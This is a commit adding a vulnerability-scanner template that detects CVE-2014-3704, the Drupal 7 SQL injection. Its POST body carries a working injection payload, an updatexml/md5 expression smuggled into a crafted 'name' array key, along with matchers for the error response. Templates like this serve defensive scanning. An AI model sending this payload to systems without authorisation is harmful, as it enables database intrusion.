Merge pull request #1220 from projectdiscovery/princechaddha-patch-5

Create CVE-2014-3704.yaml
2021-04-21 23:55:51 +05:30 · 2021-04-21 23:55:51 +05:30 · b5d16381de
parent 1979a16f94 bcab1f76c3
commit b5d16381de
1 changed files with 27 additions and 0 deletions
--- a/cves/2014/CVE-2014-3704.yaml
+++ b/cves/2014/CVE-2014-3704.yaml
@ -0,0 +1,27 @@
+id: CVE-2014-3704
+info:
+  name: Drupal Sql Injetion
+  author: princechaddha
+  severity: high
+  description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
+  reference: https://www.cvedetails.com/cve/CVE-2014-3704/
+  tags: cve,cve2014,drupal,sqli
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/?q=node&destination=node"
+    body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 500
+
+      - type: word
+        words:
+          - "PDOException"
+          - "e807f1fcf82d132f9bb018ca6738a19f"
+        condition: and
+        part: body